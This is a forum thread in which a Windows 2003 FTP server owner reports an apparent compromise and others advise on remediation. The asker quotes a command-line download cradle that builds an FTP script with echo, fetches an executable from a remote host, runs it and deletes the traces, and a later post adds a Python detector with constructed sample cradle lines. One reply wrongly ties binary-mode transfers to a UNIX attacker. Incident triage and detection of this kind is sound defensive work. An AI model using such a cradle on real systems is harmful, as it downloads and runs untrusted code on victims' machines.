FTP server - possible virus/backdoor/trojan?

I have a standard, fully patched Windows 2003 Server running as an FTP server. I have done a full virus and spyware scan, but every so often I log in via VNC and there will be a command prompt open with the following text:


Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection


This is VERY worrying - and I can't find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
STEVEO5 Asked:

Phil_Agcaoili Commented:
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server doesn't require authentication - however SOME virtual directories restrict access by only allowing PCs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.

Kruno Džoić (System Engineer) Commented:
services.msc, and check for services with the letters "ftp" or strange services (use Google to identify services).

STEVEO5 (Author) Commented:
Had a look - couldn't find anything strange - although I noticed this command in the Start, Run dialogue and I didn't type it - any ideas?


cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit

Phil_Agcaoili Commented:
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt FTP server
- Monitor network activity just in case other systems have been compromised


maninblac1 Commented:
Well, it's difficult for me to tell you exactly what's going on, but it sure looks like a hack.

But the thing I can tell you is it's likely the hacker is coming from a computer that is running UNIX.

UNIX (and maybe Linux as well, I'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data. That was a big tip-off to me: your server is 2003 and yet it is in binary mode, something odd for a Windows box to my knowledge.

Is this an FTP server with logon required? If so, doesn't Windows transmit FTP user/passwords in plain text, so a packet sniffer could have sniffed out a login and is now accessing your FTP?

Check your logs for connections and the users who connected you may find your answers there.

In fact, either this is a script, or it's definitely a hack. The command flags indicate suspicious behaviour: running the command then closing the prompt ("cmd.exe /c"), then he gets a file 870.exe off of a remote server. Then he does "ftp -n -s", suppresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe, but it appears that he deletes it before he leaves. I'd beef up security, definitely.

STEVEO5 (Author) Commented:
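For anyone triaging the same thing, the Run-dialogue command above is a self-contained "download cradle": an FTP script is assembled with echo redirects, fed to ftp -n -s:, and the fetched executable is run and the evidence deleted. The following Python is an added example (not from this thread or any product mentioned in it) that parses command lines of that shape, pulls out the indicators a responder wants (remote host, port, account, fetched files, whether the file was executed), and flags only the inline-built download pattern so a legitimate ftp -s: scheduled job is not reported. It assumes you can collect process command lines (for example from process-creation auditing); the sample lines, addresses and file names below are constructed for the demonstration.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple

# Constructed sample command lines, as a process-creation audit log might record them.
# Addresses are documentation ranges; file names are hypothetical.
SAMPLE_COMMAND_LINES = [
    r"cmd.exe /c del i&echo open 198.51.100.7 6745 > i&echo user 1 1 >> i "
    r"&echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit",
    r"cmd.exe /c dir C:\inetpub\ftproot",
    r"ftp -s:C:\scripts\nightly_upload.txt 203.0.113.10",
    r"cmd.exe /c echo open 198.51.100.9 > s & echo user anonymous x >> s "
    r"& echo binary >> s & echo get tool.exe >> s & echo bye >> s & ftp -n -s:s",
]


@dataclass
class FtpScriptFinding:
    script_file: str                 # file handed to ftp via -s:
    inline_script: bool              # script body was written by echo in the same command line
    host: Optional[str] = None
    port: Optional[int] = None
    user: Optional[str] = None
    downloads: List[str] = field(default_factory=list)
    executes_download: bool = False  # a fetched file name is invoked after the ftp call


# ftp / ftp.exe invoked with a script file; [^&|] keeps the match inside one command.
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\s[^&|]*?-s:([^\s&|]+)", re.I)
# "echo <text> > file" and "echo <text> >> file"
ECHO_RE = re.compile(r"\becho\s+(.*?)\s*>>?\s*([^\s&|]+)", re.I)


def analyze_command_line(cmdline: str) -> Optional[FtpScriptFinding]:
    """Return a finding for any ftp -s: invocation, or None if there is none."""
    m = FTP_SCRIPT_RE.search(cmdline)
    if not m:
        return None
    finding = FtpScriptFinding(script_file=m.group(1), inline_script=False)

    # Reassemble the FTP script from the echo lines that target the script file.
    for body, target in ECHO_RE.findall(cmdline):
        if target.lower() != finding.script_file.lower():
            continue
        finding.inline_script = True
        parts = body.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            finding.host = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                finding.port = int(parts[2])
        elif verb == "user" and len(parts) >= 2:
            finding.user = parts[1]
        elif verb in ("get", "recv", "mget") and len(parts) >= 2:
            finding.downloads.append(parts[1])

    # Is any fetched file run after the ftp call ("&870.exe", "| 870.exe", "start 870.exe")?
    tail = cmdline[m.end():]
    for name in finding.downloads:
        if re.search(r"(?:^|[&|]\s*|\bstart\s+)" + re.escape(name) + r"\b", tail, re.I):
            finding.executes_download = True
    return finding


def is_suspicious(finding: FtpScriptFinding) -> bool:
    """An FTP script built inline that fetches files is the download-cradle pattern."""
    return finding.inline_script and bool(finding.downloads)


def scan(cmdlines: Iterable[str]) -> List[Tuple[str, FtpScriptFinding]]:
    """Return (command line, finding) pairs for every suspicious entry."""
    hits = []
    for line in cmdlines:
        finding = analyze_command_line(line)
        if finding and is_suspicious(finding):
            hits.append((line, finding))
    return hits


if __name__ == "__main__":
    for line, f in scan(SAMPLE_COMMAND_LINES):
        print(f"SUSPICIOUS host={f.host} port={f.port} user={f.user} "
              f"files={f.downloads} executed={f.executes_download}")
```

The host and port recovered this way are what you would then look for in the firewall logs and block; the account name (here "1") and the transferred file names are the terms to search the IIS FTP logs for, whether or not the executable is still on disk.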
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server doesn't require authentication - however SOME virtual directories restrict access by only allowing PCs on the local subnet.

Computer101 Commented:
Forced accept.

Computer101
EE Admin